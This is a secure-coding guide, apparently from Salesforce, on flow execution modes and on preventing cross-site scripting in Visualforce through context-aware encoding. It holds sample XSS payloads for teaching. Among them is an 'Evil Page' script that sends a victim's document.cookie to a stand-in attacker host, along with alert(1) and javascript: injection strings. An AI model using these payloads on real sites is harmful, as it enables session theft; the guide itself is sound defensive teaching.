This guide walks you through the most common security issues Salesforce has identified while auditing
applications built on or integrated with the Lightning Platform.
This guide takes into account that many of our developers write integration pieces with the Lightning
Platform and includes examples from other web platforms such as Java, ASP.NET, PHP and Ruby on Rails.
The Lightning Platform provides full or partial protection against many of these issues. It is noted when
this is the case.
Consider this an easy-to-read reference rather than thorough documentation of all web application
security flaws. More details on a broader spectrum of web application security problems can be found
on the OWASP (Open Web Application Security Project) site.
CHAPTER 2 Considerations for Flow Design
Plan for these considerations to securely design, implement, and manage flows.
Use Subflows
Split flows into subflows to modularize your processes and control the execution context of specific
parts. Using subflows allows a main flow to run in User Mode while placing the privileged operations
in subflows that run in System Mode. For example, a flow that creates a new opportunity can run in
User Mode, and the subflow that assigns ownership based on complex rules can run in System Mode
with sharing enabled.
Dividing flows into privileged and unprivileged portions is recommended.
• Unprivileged portions run in User mode.
• Privileged portions run in System Mode and can be placed into subflows.
For example, for flows that insert leads: to avoid duplicate lead insertion, place the logic that
searches all leads for duplicates in a privileged subflow, while the flow that inserts the leads
runs in User Mode.
Note: Explicitly setting the execution context is recommended. The execution context is
determined by the advanced 'run in mode' settings, which are controlled by the flow author, and by
how the flow is invoked. If invoked from an Apex class, the flow always runs in System Mode
Without Sharing, irrespective of the flow settings. In all other cases, the process follows the
configured flow settings.
CHAPTER 3 Secure Coding Cross Site Scripting
Cross-site scripting (XSS) is a prevalent security threat where attackers inject malicious scripts into web
pages, potentially leading to data theft, session hijacking, and altered website content. This topic will
cover how XSS attacks work and how to protect against them.
What is it?
Cross-site scripting is a vulnerability that occurs when an attacker can insert unauthorized JavaScript,
VBScript, HTML, or other active content into a web page viewed by other users. A malicious script inserted
into a page in this manner can hijack the user’s session, submit unauthorized transactions as the user,
steal confidential information, or simply deface the page. Cross-site scripting is one of the most serious
and most common attacks against web applications today.
XSS allows malicious users to control the content and code on your site, something only you should
be able to do!
Sample vulnerability
Consider a web application with a search feature. The user sends their query as a GET parameter, and
the page displays the parameter in the page:
Request: https://example.com/api/search?q=apples
Response: “You searched for apples”
For example, this could be done with the following Visualforce page:
<apex:page>
    <!-- Vulnerable Page at https://example.com/api/search -->
    <div id='greet'></div>
    <script>
        document.querySelector('#greet').innerHTML='You searched for <b>{!$CurrentPage.parameters.q}</b>';
    </script>
</apex:page>
An XSS attack could take place if the user were visiting another site that included the following code:
<html>
    <!-- Evil Page -->
    <body>
        <h1>Ten Ways to Pay Down Your Mortgage</h1>
        <iframe id='attack' style='visibility:hidden'></iframe>
        <script>
            var payload = "\x3csvg onload=\x27document.location.href=\x22http://cybervillians.com?session=\x22+document.cookie\x27\x3e";
            document.querySelector('#attack').src =
                "https://example.com/api/search?q=" + encodeURIComponent(payload);
        </script>
    </body>
</html>
The victim’s browser will parse this response and render the following example.com DOM:
<div id='greet'>
You searched for
<b>
<svg
onload='document.location.href="http://cybervillians.com?session=" +
document.cookie'>
</b>
</div>
Once the DOM is rendered, the browser will navigate the page to cybervillians.com, sending the
user's example.com cookies along. It is as if example.com's developers had written their page that
way. And there is essentially no limit to the payloads the attacker could have provided: anything
example.com developers can do with HTML and JavaScript, the attacker can also do.
Consider the sample page again, this time with the merge-field placed inside a Javascript string:

<script>
    document.querySelector('#greet').innerHTML='You searched for
<b>"{!$CurrentPage.parameters.q}"</b>';
</script>
For example, by setting the URL parameter to be q='; ....attacker code here..;//'
Finally, the Javascript parser invokes an innerHTML write, passing a string back to the HTML parser
for DOM rendering. Here the attacker can inject another payload containing an HTML tag with a
javascript event handler. Because the string passed to innerHTML is defined in a Javascript context,
the control characters do not need to be literal < or > characters, but can be represented as '\x3c'
and '\x3e'. These will be interpreted by the Javascript engine as brackets to be written into the
DOM. This is the original sample attack.
Therefore the sample code has three different parsing stages which allow for three different attacks,
triggered by the insertion of three different control characters:
– > can be used to break out of the original script block
– ' can be used to break out of the javascript string declaration
– \x3c or \u003c or < can be used to inject a new tag via innerHTML.
Other constructions have other parsing stages and potential attacks -- the list of potentially dangerous
characters is dependent on the sequence of parsers applied to user data.
Rather than trying to learn all possible dangerous characters, the developer should learn to identify
the sequence of browser parsing passes and apply the corresponding sequence of escaping functions.
This will ensure that user data renders properly as text and cannot escape into an execution context.
Only attribute values and the text value of a node are considered data by the HTML parser. All other
tokens are considered markup.
There are two main mechanisms of injecting javascript into HTML:

<div>[userinput]</div>      <!-- userinput = <script>alert(1)</script> -->
<div>[userinput]</div>      <!-- userinput = <svg onload='payload'> -->
<div title='[userinput]'>   <!-- userinput = ' onmouseover='payload' -->
– Directly as a script tag or other HTML tag that supports a javascript event handler
– Breaking out of an html tag and creating another html tag that is a javascript event handler
Because of this, user input within an HTML context must be prevented from breaking out of a
quoted attribute value and from injecting HTML tags. This is done with HTML encoding.
HTML Encoding
In order to force a string character to be interpreted as data rather than markup, a character reference
should be used. There are two common ways to denote a character reference:
– numeric character references represent the character with an ampersand (&) and the pound sign (#),
followed by either the decimal unicode code point value or an "x" and the hexadecimal value, and
closed by a semicolon (;). This allows every unicode character to be referenced. For example,
&#60; and &#x3c; both denote "<".
– entity character references represent a subset of commonly used special characters with an
ampersand (&), an ascii mnemonic for the character's name, and an (optional) closing semicolon.
For example, &lt; denotes "<".
HTML Encoding is the process of replacing characters by their character references and HTML
decoding is the reverse.
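The two reference styles can be combined into a minimal encoder. The sketch below is illustrative only (a hypothetical helper, not a platform or library function); it covers the characters that matter for security:

```javascript
// Minimal HTML encoder (illustrative sketch, not a vetted library).
// Ampersand must be replaced first, or existing references get double-encoded.
function htmlEncode(s) {
  return s.replace(/&/g, '&amp;')    // entity reference for &
          .replace(/</g, '&lt;')     // entity reference; &#60; or &#x3c; also work
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;');   // numeric reference: ' lacks a universally supported name
}
```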
<html>
    <body>
        <div id="link1">
            &lt;a href="www.salesforce.com"&gt;link&lt;/a&gt; <!-- Not interpreted as a tag but as text-->
        </div>
        <div id="link2">
            <&#97; href="www.salesforce.com">link</a> <!-- Not interpreted as an anchor tag -->
        </div>
        <div id="link3">
            <a &#104;ref="www.salesforce.com">link</a> <!-- link without anchor-->
        </div>
        <div id="link4">
            <a href="www.&#115;&#97;&#108;&#101;&#115;force.com">link</a> <!-- works fine. -->
        </div>
    </body>
</html>
– For link1, because the bracket is replaced by its character reference, the less than sign is treated
as a string literal. The closing tag </a> is viewed as a redundant closing tag and is not rendered
in the DOM at all.
– In link2, an escaped character immediately follows the opening bracket. The HTML parser expects
a tagname (markup) there; since an escaped character cannot be markup, the parser bails on tag
processing and interprets the opening bracket as text. The closing tag is swallowed as in link1.
– In link3, the anchor tag is successfully parsed but as the "h" in "href" is escaped, the href is not
interpreted as an attribute and the result is an anchor tag without an href, the link text appears
but is not clickable.
– In link4, because only a portion of an attribute value is encoded, the character references are
simply decoded in the DOM; the link is clickable and successfully navigates to www.salesforce.com.
Therefore if developers HTML encode user data prior to HTML rendering, the data will always render
as text and never as markup. In general, only a subset of characters is HTML encoded: those that
can allow an attacker to inject their own tags or break out of a quoted attribute value, namely the
ampersand (&), the brackets (< and >), and the quote characters (" and ').
When using unquoted attribute values or when failing to close tags other characters need to be
escaped. However in this case the set of characters that would need to be escaped are browser
dependent and may change with new browser versions. Developers should ensure that all HTML
tags are balanced and that all attribute values are quoted. User data within an HTML context should
only appear as the text content of an existing tag or within a quoted attribute value.
Within <script> tags, CDATA-style parsing is used: character references are not decoded, and the
parser simply scans for the first closing </script> sequence, even when it occurs inside a
Javascript string:

<html>
    <body>
        <script>
            console.log('in alpha</script><script>console.log("not in alpha");</script>');
        </script>
    </body>
</html>
Another example:
<html>
<head>
</head>
<body>
<div id='xyz' onclick='console.log(&quot;decoded&quot;)'>Click me!</div>
<div id='baa'>Click me!</div>
<div id='baz'>Click me!</div>
<script>
    document.querySelector('#baa').onclick = function() {
        console.log("decoded");
        return true;
    }
</script>
<script>
    document.querySelector('#baz').onclick = function() {
        console.log("Howdy!</script><script>alert(1)</script>");
        return true;
    }
</script>
Clicking on the first div logs decoded (the character references in the attribute are HTML-decoded
before the Javascript runs), and clicking on the second also logs decoded. The third registration
is broken: the </script> inside its string terminates the script block during HTML parsing, so the
injected alert(1) executes as soon as the page loads rather than on click.
CDATA-style processing presents a number of potential pitfalls:
– Refactoring issues: If a developer first defines the event handler inline and then refactors to
register event handlers within a script tag, she will need to ensure that one fewer HTML-encode
operation occurs, otherwise data will be over-encoded. Similarly, refactoring away from separate
registration towards inline definition can lead to under-encoding. In both cases the resulting
page is broken, but the breakage can be subtle: alphanumeric characters continue to render
properly, while a character like "<" is either rendered as the literal text "&lt;" (over-encoding)
or interpreted as markup (under-encoding).
– JS string escapes: As per the example, if an attacker can inject brackets into a javascript string
context, they may be able to break out of the string by breaking out of the parent script context
entirely. This effectively makes brackets javascript control characters.
– Complex parsing rules with comments: The combination of html-style comment tags with
<script> or <style> tags can lead to confusing or unexpected behavior. We will not detail these
parsing rules here, but developers should not nest <script> tags within each other or place html
comments <!-- on the same line as <script> tags.
Escapable Raw Text Parsing
For <textarea> and <title> tags, escapable raw text parsing is used. Here the parser looks for the
closing </textarea> or </title> tag and does not allow the creation of any new tags. Nevertheless,
character references are decoded.
In this context keep the following in mind:
– Do not assume that user data cannot break out of this context -- data can break out by closing
the title or textarea tag.
– When using this context to store HTML micro templates, do not allow user input to write to this
context without HTML encoding
• Javascript Parser
A Javascript parser tokenizes javascript code for execution by the browser's javascript engine.
Javascript code can generate new HTML code (e.g. document.write(), element.innerHTML=x) and can
also skip the HTML parser and update the DOM directly (e.g. document.createElement(),
element.title=x, document.body.appendChild()). Javascript code can also update element styles via
the CSS Object Model (CSSOM).
Javascript has several encoding formats:
– C-style backslash encoding of special characters: \\, \', \", \n, and so on
– 2-digit hex encoding of the corresponding ASCII code point: \xNN
– 3-digit octal encoding of the corresponding code point: \NNN
– 4-digit hex encoding of a UTF-16 code unit: \uNNNN. Surrogate pairs are handled by placing
the two references next to each other: \uAAAA\uBBBB
The following table shows the typical behavior of a javascript encoder:

Character           Encoded
Backslash \         \\
Single quote '      \'
Double quote "      \"
Newline             \n
Carriage return     \r
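The typical encoder behavior above can be sketched as a small Javascript function (a hypothetical helper for illustration; in Visualforce, use the platform's JSENCODE instead):

```javascript
// Illustrative JS string encoder: backslash first, then quotes and newlines.
function jsEncode(s) {
  return s.replace(/\\/g, '\\\\')
          .replace(/'/g, "\\'")
          .replace(/"/g, '\\"')
          .replace(/\n/g, '\\n')
          .replace(/\r/g, '\\r');
}
```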
Javascript encoding is not nearly as powerful as HTML encoding. Object names (variables, functions,
arrays) can be encoded in Javascript and still be callable, so merely encoding something does not
mark it as data rather than code. Instead, Javascript encoding is used to prevent user data from
breaking out of a quoted string context, by escaping the characters that would close out a string
(single and double quotes, as well as new lines). Additionally, because of CDATA parsing, a closing
script tag can also break out of a string (by breaking out of the enclosing script).
Note that if user controlled data is placed into a javascript context without being quoted, then
nothing can prevent XSS. All user data in javascript should be quoted AND encoded.
Be aware that Javascript decoding also occurs when strings are evaluated as code, such as with
eval, setInterval, or the Function constructor; in that case you need to apply one additional layer
of JS encoding for each implicit eval performed. Because of this, it is recommended that you do not
eval code containing user data.
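The extra layer can be demonstrated directly. The jsEncode helper below is hypothetical (shown only to make the layering concrete); each eval consumes exactly one layer of encoding:

```javascript
// Hypothetical helper: escape the characters that close a JS string.
function jsEncode(s) {
  return s.replace(/\\/g, '\\\\').replace(/'/g, "\\'")
          .replace(/"/g, '\\"').replace(/\n/g, '\\n').replace(/\r/g, '\\r');
}

var user = "'; alert(1); //";   // attacker-controlled text

// One parsing layer: the data sits directly in a quoted JS context.
var once = "var x = '" + jsEncode(user) + "'; x";

// Two parsing layers: the quoted context itself lives inside an eval'd
// string, so the data is decoded twice and must be encoded twice.
var twice = 'eval("var y = \'' + jsEncode(jsEncode(user)) + '\'; y")';
```

Evaluating either string yields the original text as inert data; with one encoding layer missing, the payload would instead break out of its string.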
Javascript can invoke the HTML parser by means of one of the built-in HTML rendering methods:
document.write
document.writeln
element.innerHTML
element.insertAdjacentHTML
If you are using jQuery, the following common DOM manipulation methods invoke the HTML parser in
their implementation (cf. the DOM XSS Wiki):
.append()
.before()
.after()
.html()
.prepend()
.replaceWith()
.wrap()
.wrapAll()
If you are using a different toolkit or a higher-order javascript framework, you need to know
whether the methods you call invoke the HTML parser or not; otherwise you risk over- or
under-encoding data.
<html>
    <head>
        <script src='/jquery.js'></script>
    </head>
    <body>
        <div id='xyz'></div>
        <script>
            //payload
            var payload = "<svg onload='alert(1)'>";
            var html_encoded_payload = "&lt;svg onload='alert(1)'&gt;";

            var el = document.querySelector('#xyz');
            el.innerHTML = payload; //vulnerable
            el.innerHTML = html_encoded_payload; //safe and correct
            el.innerText = payload; //safe
            el.innerText = html_encoded_payload; //safe but double encoded
            $('#xyz').append(payload); //vulnerable
            $('#xyz').append(html_encoded_payload); //safe and correct
            $('#xyz').text(payload); //safe
            $('#xyz').text(html_encoded_payload); //safe but double encoded
        </script>
    </body>
</html>
• URI Parser
The URI parser tokenizes URIs into the following components:
scheme://login.password@address:port/path?query_string#fragment
Control characters for the URI parser are the scheme name, the scheme delimiter ":", ".", "?", "/",
and "#". Data for the URI parser are the two credentials, the address, the path, the query string,
and the fragment content.
In those cases when, for example, a path needs to contain a question mark that should not be
interpreted as a control character, URI encoding is used: %3f. URI encoding is defined in RFC
3986 and consists of a percent sign followed by the two-digit hexadecimal value of the (extended)
ascii code point.
For security encoding, be aware that browsers support multiple pseudo-schemes, the most important
of which is the javascript pseudo scheme: javascript:..payload..
If the scheme or the scheme delimiter (:) is URI encoded, it will not be interpreted as a scheme.
Similarly, if a "/" is URI encoded, it will not be interpreted as a path delimiter. Therefore URI
encoding an entire string and setting it as an href will cause the browser to interpret the whole
string as a relative path, with no URL parameters and no fragment.
<html>
    <body>
        <a id='xyz'>Click me!</a>
        <script>
            var el = document.querySelector('#xyz');
            el.href='javascript:alert(1)'       //executes
            el.href='javascript:\x61lert(1)'    //js encode 'a' in alert. executes
            el.href='javascript\x3aalert(1)'    //js encode ':' in scheme. executes
            el.href='javascript%3aalert(1)'     //URI encode ':' in scheme. does not execute
            el.href='javascript&#x3a;alert(1)'  //HTML encode ':' in scheme. does not execute
                                                //(character references are not decoded here)
            el.outerHTML = '\x3ca href=\x22javascript:alert(1)\x22\x3eClick me!\x3c/a\x3e'; //executes
        </script>
    </body>
</html>
13
Secure Coding Cross Site Scripting
Because URI encoding maps characters to %XX sequences, which are not HTML, JS, or CSS control
characters, we can skip any additional encodings that would need to occur after URI encoding. We
cannot, however, skip encodings that are required before URI encoding:
<html>
    <body>
        <!-- Vulnerable to XSS -->
        <a id='xyz'>Click me!</a>
        <script>
            var xyz = document.querySelector('#xyz');
            var payload = "javascript:alert(1)";
            xyz.href = "javascript:this.innerHTML=\x22" + payload + "\x22"; //vulnerable
        </script>
    </body>
</html>
In the above, payload is sent to a URI parser (in the href definition) and then to the HTML parser.
Properly encoding the payload therefore requires both encodings:
URIENCODE(HTMLENCODE(payload)).
If the payload is only HTML encoded, then a %3c will be URI decoded into a bracket. If the payload
is only URI encoded, then a literal "<" can be injected directly.
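The ordering can be checked with a sketch (the htmlEncode helper is hypothetical; decodeURIComponent below stands in for the browser's URI parser):

```javascript
// Hypothetical HTML encoder covering the dangerous characters.
function htmlEncode(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

var payload = "<svg onload='alert(1)'>";
var safe = encodeURIComponent(htmlEncode(payload));  // URIENCODE(HTMLENCODE(payload))

// The URI parser decodes first, leaving the HTML-encoded form ...
var afterUri = decodeURIComponent(safe);
// ... which the HTML parser then renders as inert text: no raw '<' remains.
```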
As URI encoding is only defined on ASCII codes 0-255, when higher code points need to be encoded,
they are first transformed into a sequence of UTF-8 bytes and then each byte is URI encoded.
Be aware that javascript contains three built in URI encoding and decoding functions, none of which
are suitable for security encoding:
– escape() and unescape() have been deprecated because of improper UTF-8 handling.
– encodeURI() and decodeURI() are designed to allow URIs containing some illegal characters to be
converted to legal URIs. These functions do not encode URI control characters such as ":", "/",
or ".".
– encodeURIComponent() and decodeURIComponent() are designed to encode all URI control
characters, but still leave some characters, such as the single quote, unencoded.
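The difference between the built-ins is easy to demonstrate:

```javascript
var s = "a:/b'c";

// encodeURI leaves URI control characters (':' and '/') untouched.
var whole = encodeURI(s);               // "a:/b'c"

// encodeURIComponent encodes ':' and '/', but not the single quote.
var component = encodeURIComponent(s);  // "a%3A%2Fb'c"
```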
For guidance as to which functions to use, see the specific section guidance.
• CSS Parser
CSS parsers have their own encoding format: a backslash followed by up to six hexadecimal digits
giving the ISO 10646 (unicode) code point. Because the number of digits is variable, a trailing
space is required to close out the character reference when fewer than six digits are used; in that
case the space is consumed by the CSS parser.
As with Javascript encoding, merely encoding a string does not force the CSS parser to treat it as
data rather than markup -- the encoding is only useful to prevent user data from breaking out of a
quoted string declaration. Unfortunately, many CSS property values are not quoted, in which case
it is impossible to safely encode the value. In this case, strict use of an allowlist (which provides a list
of allowed values and prevents the use of anything unlisted) is required to ensure that only the
expected characters are present in the string.
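A CSS encoder can be sketched as follows (hypothetical helper; remember it only helps inside a quoted CSS string, and unquoted property values need allowlist validation instead):

```javascript
// Illustrative CSS encoder: backslash, hex code point, closing space.
function cssEncode(s) {
  return Array.from(s).map(function (c) {
    return /[a-zA-Z0-9]/.test(c)
      ? c
      : '\\' + c.codePointAt(0).toString(16) + ' ';  // trailing space closes the reference
  }).join('');
}
// cssEncode("a'b") yields "a\27 b"
```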
There are several ways that the CSS parser can invoke the URI parser (for example by referencing an
image URL or a style sheet URL), but invocation of javascript from CSS is limited to browser specific
features such as moz-bindings or older browser features (such as expression or javascript
pseudo-schemes). Nevertheless, as Salesforce supports these older browsers, it's critical to use an
allowlist—a list of all acceptable values— on user data whenever it is passed to the CSS interpreter.
When CSS is invoked from javascript, for example with element.style="x", it is first interpreted by the
javascript parser and then by the CSS parser. In such cases, javascript control characters should be
escaped. If they aren't, they could be used to bypass the allowlist filter. For this reason, filtering
against the allowlist should be done as close to the sink as possible.
General References
– Coverity Static Analysis
– OWASP XSS Portal
– HTML5 Security Cheat Sheet
– OWASP XSS Test Guide
– Browser Internals and Parsing
– Browser Security Handbook
– Browser Parsing and XSS review of different frameworks
Specific Guidance
Apex and Visualforce Applications
The platform provides two main mechanisms to avoid cross site scripting: automatic HTML encoding,
and built-in encoding functions that can be invoked manually from Visualforce. Nevertheless, in
order to use these protections correctly, the developer needs a thorough understanding of how
user-controlled variables are rendered by the browser.
There is no 'easy' button with cross site scripting defenses. Developers must understand the sequence
of rendering contexts into which they place user data, and encode appropriately for each context.
Built in Auto Encoding
All merge-fields are always auto HTML encoded provided they
• do not occur within a <style> or <script> tag
• do not occur within an apex tag with the escape='false' attribute
The auto HTML encoding performed is applied last (after any other VisualForce functions) and is applied
regardless of whether you use any other VisualForce encoding functions. It does not matter whether
the merge-field is rendered via an explicit apex tag or directly using the braces notation within HTML
markup. Your application code needs to take auto-encoding into account in order to avoid double
encoding or improperly encoding merge-fields.
For example, the value of the userInput parameter will be HTML encoded in the following:
<apex:outputText>
    {!$CurrentPage.parameters.userInput} <!-- safe (auto HTML Encoded) -->
</apex:outputText>
or here:

<div>
    {!$CurrentPage.parameters.userInput} <!-- safe (auto HTML Encoded) -->
</div>

but not within a style or script tag, where no auto-encoding is applied:

<style>
    .foo {
        color: #{!$CurrentPage.parameters.userInput}; /* vulnerable */
    }
</style>
The auto encoding only provides HTML Encoding of <, > and quotes within html attributes. You must
perform your own Javascript and URL encoding as well as handle CSS cross site scripting issues.
Auto-HTML encoding is not sufficient when passing through multiple parsing contexts:
<!--vulnerable to XSS -->
<div onclick =
"console.log('{!$CurrentPage.parameters.userInput}')">Click me!</div>
In the above code fragment, userInput is rendered in a Javascript execution context embedded within
an HTML context, so the auto-HTML encoding is insufficient. For these and other use cases, the
platform provides Visualforce encoding functions that can be chained together to provide sufficient
encoding in multiple contexts.
Unsafe sObject Data Types
sObjects can be built from a number of primitive data types. When rendering a merge-field or retrieving
a field via the API, it's important to understand whether the field contains potentially unsafe or safe
content. The following primitive data types can contain unsafe strings:
picklist: Can contain arbitrary text, independent of the field definition. Picklist values are not
enforced by the schema, and users can modify a picklist value to contain any text via an update
call.
Name fields can be arbitrary text and must be considered unsafe. This also applies to global
variables such as usernames.
Developers are urged to program defensively. Even if a primitive type (such as an Id) cannot contain
control characters, properly output encode the field type based on the rendering context. Output
encoding will never result in over encoding and will make your application safe for further refactoring
should the controller logic change -- for example, by pulling the Id from a URL parameter rather than
from the controller.
Built in VisualForce encoding functions
The platform provides the following VisualForce encoding functions:
• JSENCODE -- performs string encoding within a Javascript String context.
• HTMLENCODE -- encodes all characters with the appropriate HTML character references so as to
avoid interpretation of characters as markup.
• URLENCODE -- performs URI encoding (% style encoding) within a URL component context.
• JSINHTMLENCODE -- a convenience method that is equivalent to the composition of
HTMLENCODE(JSENCODE(x))
Data may need to be encoded multiple times if it passes through multiple parsers.
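As a rough sketch, the relationship between the functions looks like this (hypothetical helper approximations; in Visualforce, call the built-in functions themselves):

```javascript
// Illustrative approximations of the platform encoders.
function jsEncode(s) {
  return s.replace(/\\/g, '\\\\').replace(/'/g, "\\'")
          .replace(/"/g, '\\"').replace(/\n/g, '\\n').replace(/\r/g, '\\r');
}
function htmlEncode(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}
// JSINHTMLENCODE(x) behaves like the composition HTMLENCODE(JSENCODE(x)):
function jsInHtmlEncode(s) { return htmlEncode(jsEncode(s)); }
```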
JSENCODE
JSENCODE is used to prevent user data from breaking out of a quoted string context:
<script>
var x = '{!JSENCODE($CurrentPage.parameters.userInput)}'; //safe
</script>
If the data were not quoted, the user could insert code directly into the script tag. If the data
were quoted but not JSENCODEd, an attacker could break out of the quotes by including a single
quote in the URL parameter:
userInput='; alert(1); //
Because the parsing flow is HTML Parser -> JS Parser, the mergefield must be properly encoded as:
HTMLENCODE(JSENCODE(x)). As we know that the platform will HTML auto-encode last, it is enough to
explicitly invoke the inner encoding, JSENCODE.
What if the merge-field is not typed as a string? One option is to leave the merge-field naked.
However, this is a dangerous anti-pattern because it creates a dependency between the
implementation details in the controller and the security of the Visualforce page. Suppose, for
example, that in the future the controller pulls this value from a URL parameter or text field.
Now the Visualforce page is vulnerable to cross site scripting. The security of the Visualforce
page should be decoupled as much as possible from the controller implementation.
Therefore we recommend defensive programming -- cast to the appropriate type explicitly using the
built in constructors:
<script>
    var myint = parseInt("{!JSENCODE(int_data)}");       //now we are sure that myint is an int
    var myfloat = parseFloat("{!JSENCODE(float_data)}"); //now we are sure that myfloat is a float
    var mybool = {!IF(bool_data, "true", "false")};      //now we are sure that mybool is a boolean
    var myJSON = JSON.parse("{!JSENCODE(stringified_value)}"); //when transmitting stringified JSON
</script>
This way a subtle change in the controller implementation (for example, pulling the value from a URL
parameter or text field) will not trigger a security vulnerability in the corresponding VisualForce page.
HTMLENCODE
HTMLENCODE is required when userdata is interpreted in an HTML Context and is not already
auto-encoded.
For example:
<apex:outputText escape="false" value="<i>Hello {!HTMLENCODE(Account.Name)}</i>" />
In the above, because Name fields can be arbitrary text strings, any rendering of this field needs to be
properly output encoded. Because we want to combine markup (italics) with data, the apex tag is set
to escape="false" and we manually encode user data.
As always, one layer of encoding needs to be applied for each layer of parsing:
<div id="xyz"></div>
<script>
    document.querySelector('#xyz').innerHTML = 'Howdy ' + '{!JSENCODE(HTMLENCODE(Account.Name))}';
</script>
In the above, the merge-field first passes through the HTML Parser when the page is loaded, but because
the merge-field is within a script tag, the HTML parser does not perform character reference substitution
and instead passes the contents of the script block to the javascript parser. Javascript code then calls
innerHTML which performs HTML parsing (and character reference substitution). Therefore the parsing
is Javascript -> HTML, and the necessary encoding is JSENCODE(HTMLENCODE()). Note that only
performing JSENCODE or only performing HTMLENCODE will lead to a broken page and possibly a cross
site scripting vulnerability.
Here, the merge-field is sent through the HTML parser when the page is loaded. Because it is not in a
script or style tag, character reference substitution occurs, and the result is then sent to the Javascript
decoder (in the definition of the onclick event handler). Once clicked, the result will be sent back to the
HTML parser for innerHTML rendering. Therefore there are three layers of decoding: HTML -> Javascript
-> HTML, and as a result, three layers of encoding need to be applied. However HTML auto encoding
will be automatically applied at the outer layer, so the developer needs to only apply
JSENCODE(HTMLENCODE()):
<!-- safe -->
<div onclick="this.innerHTML='Howdy {!JSENCODE(HTMLENCODE(Account.Name))}'">Click me!</div>
Here, the merge-field is first parsed by the HTML parser when the page is loaded, is then passed to
the Javascript parser in the definition of the onclick handler, is passed again to the HTML parser
when the onclick handler is invoked, and is finally passed to the Javascript parser when the
element is clicked a second time. Therefore the merge-field needs to be encoded as
HTMLENCODE(JSENCODE(HTMLENCODE(JSENCODE()))). Because auto-encoding takes care of the outer
HTMLENCODE, the code fragment can be properly sanitized as follows:
<!-- safe -->
<div onclick="this.innerHTML='\x3cdiv onclick=\x22console.log(\x27Howdy {!JSENCODE(HTMLENCODE(JSENCODE(Account.Name)))}\x27);\x22\x3eClick me again!\x3c/div\x3e'">Click me!</div>
URLENCODE
URLENCODE maps each character with ascii code 0-255 to the corresponding two-digit hex
representation %XX. Therefore URLENCODE will not produce valid absolute URLs and should only be
used to encode URI components:
<!-- Safe -->
<img src="/xyz?name={!URLENCODE(Pic.name)}">{!Pic.Name}</img>

(Note that in the above fragment, Pic.Name within the text content of the image tag does not need
to be encoded, because it will be auto HTML encoded.) Because URLENCODE has such a restricted
output alphabet, there is no need for any additional encoding once it is applied: %XX is not a
valid control character in any of the other parsing contexts. Therefore the following is safe and
needs no JSENCODE or HTMLENCODE:
<script>
    // Safe, but anti-pattern
    var x = '{!URLENCODE(Pic.name)}';
var el = document.querySelector('#xyz');
el.outerHTML = '<img src = "/pics?name=' + x + '">';
</script>
Nevertheless, even though the above code is safe, it is recommended that you minimize use of HTML
rendering as much as possible:
<script>
    // Safe, and no use of HTML rendering
    var x = '{!URLENCODE(Pic.name)}';
    var el = document.querySelector('#xyz');
    el.src = '/pics?name=' + x;
</script>
One thing to keep in mind about URLs is that all browsers accept a javascript pseudo-scheme in
location URLs, while older browsers also accept a javascript pseudo-scheme in src attributes and in
url attributes within CSS. Therefore you must control the scheme as well as the host, and only
allow user input to set URL parameters or paths. In those cases when users select the host, you
must create an allowlist of acceptable hosts and validate against it to avoid arbitrary redirect
vulnerabilities.
JSINHTMLENCODE
JSINHTMLENCODE is a legacy VisualForce function that was introduced when the platform did not always
auto HTML encode merge-fields. JSINHTMLENCODE is effectively a combination of
HTMLENCODE(JSENCODE()), so before the introduction of auto-HTML encoding, developers would need
to call this function when including merge-fields in javascript event handlers within HTML. Now that
the platform auto-HTML encodes, it is sufficient to call JSENCODE() in this case.
<!-- safe, but broken due to double html encoding -->
<div onclick="console.log('{!JSINHTMLENCODE(Account.Name)}')">Click
me!</div>
However, because the sets of control characters for HTML and JavaScript are almost disjoint,
JSINHTMLENCODE can still be used as a replacement for JSENCODE(HTMLENCODE(x)), saving
one function call in Visualforce:
<script>
var el = document.querySelector('#xyz');
el.innerHTML = "Howdy {!JSINHTMLENCODE(Account.Name)}"; //safe and accurate
</script>
XSS in CSS
Cascading Style Sheets is an increasingly complex language that is only slowly becoming standardized
across browsers. Modern browsers do not allow javascript injection within CSS attribute values, but
this is not true of older browsers. Unfortunately it is not sufficient to cast CSS attribute values
to strings and then encode them, because many CSS properties are not rendered as strings.
<style>
<!-- vulnerable to XSS unless verified with an allowlist in the controller -->
foo {
color: #{!color};
}
</style>
As a result, do not place any merge-fields within a <style> tag unless they are on an allowlist (a list of
acceptable fields, unlisted fields are not allowed) in the controller. Alternatively, first pass the variables
to a javascript context, validate them in javascript, and then use CSSOM or a js toolkit to update the style
programmatically:
<script>
var el = document.querySelector('#xyz');
var color = '{!JSENCODE(color)}'; //must JSENCODE to prevent breaking out of string
if ( /(^[0-9a-f]{6}$)|(^[0-9a-f]{3}$)/i.test(color) ) {
el.style.color='#' + color; //safe to render into a style context
}
</script>
If a field such as xyz__c is built from one of the dangerous sObject field types, such as text, passing it
to an HTML rendering function creates a vulnerability. In this case, the developer has two options:
• Use a safe DOM manipulation function such as innerText, rather than innerHTML.
• Properly encode the data in javascript prior to the innerHTML write.
The first option is preferred, but may sometimes be impractical (for example, when you are using a
higher-level toolkit that performs innerHTML writes in the method you are using). In this case you must
use a javascript encoding library.
Javascript Security Encoding Libraries
Although Salesforce does not currently export javascript security encoding methods, there are a number
of third party security libraries that you can use.
We recommend the GoInstant secure-filters library because it has been vetted by the Salesforce security
team and is small and easy to use. It is also available as a node package. To use this library, place the
secure-filters.js file in your static resources. The library will export a secureFilters object which has a
number of encoding methods:
<apex:page controller="Xyz">
<apex:includeScript value="{!$Resource.SecureFilters}"/>
<div id="result">result</div>
<script type="text/javascript">
//
//convenience methods
//
var html_encode = secureFilters.html; // applies HTMLENCODE
var js_attr_encode = secureFilters.jsAttr; // applies HTMLENCODE(JSENCODE)
var style_encode = secureFilters.style; // applies HTMLENCODE(CSSENCODE)
//Example usage
Visualforce.remoting.Manager.invokeAction(
    '{!$RemoteAction.Xyz.getName}',
    function(result, event){
        if (event.status) {
            //requires html encoding
            $("#xyz").append(html_encode(result));
            //requires html(js(encoding))
            $("#xyz").append(
                "<div id='abc' onclick=\"console.log('" + js_attr_encode(result) + "');\">Click me</div>"
            );
            //do not encode here
            $("#abc").mouseover(function() {
                console.log('You moused over ' + result);
            });
        } else {
            //don't forget to encode messages in error conditions!
            $("#responseErrors").html(
                html_encode(event.message)
            );
        }
